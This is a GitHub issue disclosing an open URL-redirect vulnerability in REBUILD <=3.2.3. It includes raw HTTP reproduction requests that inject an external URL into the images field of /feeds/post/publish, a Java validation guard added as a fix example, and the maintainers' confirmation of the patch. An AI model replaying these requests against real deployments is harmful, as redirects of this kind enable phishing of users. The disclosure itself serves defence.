
A URL redirection vulnerability exists in the /filex/img/** interface of the REBUILD system #596

Closed
Mechoy opened this issue Mar 19, 2023 · 2 comments


Mechoy commented Mar 19, 2023

Version

<=3.2.3

What's the problem

A URL redirection vulnerability exists in the /filex/img/** interface of the REBUILD system.

How to reproduce this problem

Function points

Create a new post in the Feeds (dynamic) function (an image must be inserted), click Publish, capture the request sent to the /feeds/post/publish interface, and change the content of the images field.

POST /feeds/post/publish HTTP/1.1
Host: 192.168.0.102:18080
Content-Length: 112
X-AuthToken: 
Accept: */*
X-CsrfToken: 
X-Requested-With: XMLHttpRequest
X-Client: RB/WEB
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://192.168.0.102:18080
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close

{"content":"333","images":["http://www.baidu.com"],"scope":"ALL","type":1,"metadata":{"entity":"Feeds"}}

View the front-end page and find that http://www.baidu.com has been successfully added.

GET /filex/img/http://www.baidu.com?imageView2/2/w/300/interlace/1/q/100 HTTP/1.1
Host: 192.168.0.102:18080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer: http://192.168.0.102:18080/feeds/home
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: _ga=GA1.1.113967341.1678976466; rb.sidebarCollapsed=false; JSESSIONID=B51949A25F4A795D30CE4B6D7EB82380; _ga_CC8EXS9BLD=GS1.1.1679246509.11.1.1679246516.0.0.0
Connection: close

Click Download File; the browser is successfully redirected to http://www.baidu.com

System environment (OS/MySQL/Browser etc.)

Mysql 5.7.26
Windows
JDK1.8.0_341
Chrome

Suggested description

A URL redirection vulnerability exists in rebuild <=3.2.3

Vulnerability Type

URL Redirection

Vendor of Product

https://github.com/getrebuild/rebuild

Affected Product Code Base

<=3.2.3

Affected Component

/feeds/post/publish
/filex/img/**

Attack Type

Remote

Cause of vulnerability

In the com.rebuild.web.commons.FileDownloader#viewImg() method, the image path is read, content is retrieved according to that path, and a redirect is then issued based on the retrieved content.
The image path is passed in by the com.rebuild.web.feeds.FeedsPostController#publish method.
By changing the image path information to a malicious website address, an attacker can cause a URL redirection when a user clicks to download the file.
The end, thanks!
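A hardening check for the cause described above, added here as an example; it is not REBUILD's own code, and the class name ImagePathGuard and the assumed storage-key format ("rb/202303/photo.png") are assumptions. It rejects any image reference that carries a scheme or authority (such as http://www.baidu.com) or a traversal segment, so that only local storage keys ever reach viewImg() and its redirect.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.util.Arrays;
import java.util.List;

/** Hypothetical guard (not REBUILD's own code): accepts only plain storage keys
 *  for the "images" array of a publish request, never absolute URLs. */
public final class ImagePathGuard {

    /** Returns true only for a relative storage key such as "rb/202303/photo.png". */
    public static boolean isSafeImageKey(String ref) {
        if (ref == null || ref.isEmpty() || ref.length() > 512) return false;
        URI uri;
        try {
            uri = new URI(ref);
        } catch (URISyntaxException e) {
            return false;                      // not even a well-formed reference
        }
        // "http://...", "javascript:..." (scheme) or "//evil.example" (authority) are rejected.
        if (uri.isAbsolute() || uri.getAuthority() != null) return false;
        // Keys must be relative to the storage root, not the filesystem root.
        if (ref.startsWith("/") || ref.startsWith("\\")) return false;
        // Block path traversal segments.
        for (String seg : ref.split("[/\\\\]")) {
            if (seg.equals("..") || seg.equals(".")) return false;
        }
        // Conservative character set: no ':', '?', '#' or whitespace can slip through.
        return ref.matches("[A-Za-z0-9._/-]+");
    }

    /** Validates a whole "images" array; returns the first offending entry, or null. */
    public static String firstUnsafe(List<String> images) {
        for (String img : images) {
            if (!isSafeImageKey(img)) return img;
        }
        return null;
    }

    public static void main(String[] args) {
        // Constructed sample mirroring the report: one legitimate key, one external URL.
        List<String> fromRequest = Arrays.asList("rb/202303/photo.png", "http://www.baidu.com");
        String bad = firstUnsafe(fromRequest);
        System.out.println(bad == null ? "all image keys accepted" : "rejected: " + bad);
    }
}
```

Applying this check in the publish handler (and refusing to redirect to anything that fails it in viewImg()) closes the path the report describes, since the stored value can then only name a file inside the local storage namespace.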

getrebuild (Owner) commented

Thanks for the feedback, we will fix it as soon as possible!

devezhao pushed a commit that referenced this issue Mar 20, 2023
getrebuild added a commit that referenced this issue Mar 21, 2023
* fix: `trigger/exec-manual` async

* fix: lang

* fix: #596
getrebuild (Owner) commented

We have fixed it, thanks for the report.

getrebuild added a commit that referenced this issue May 5, 2023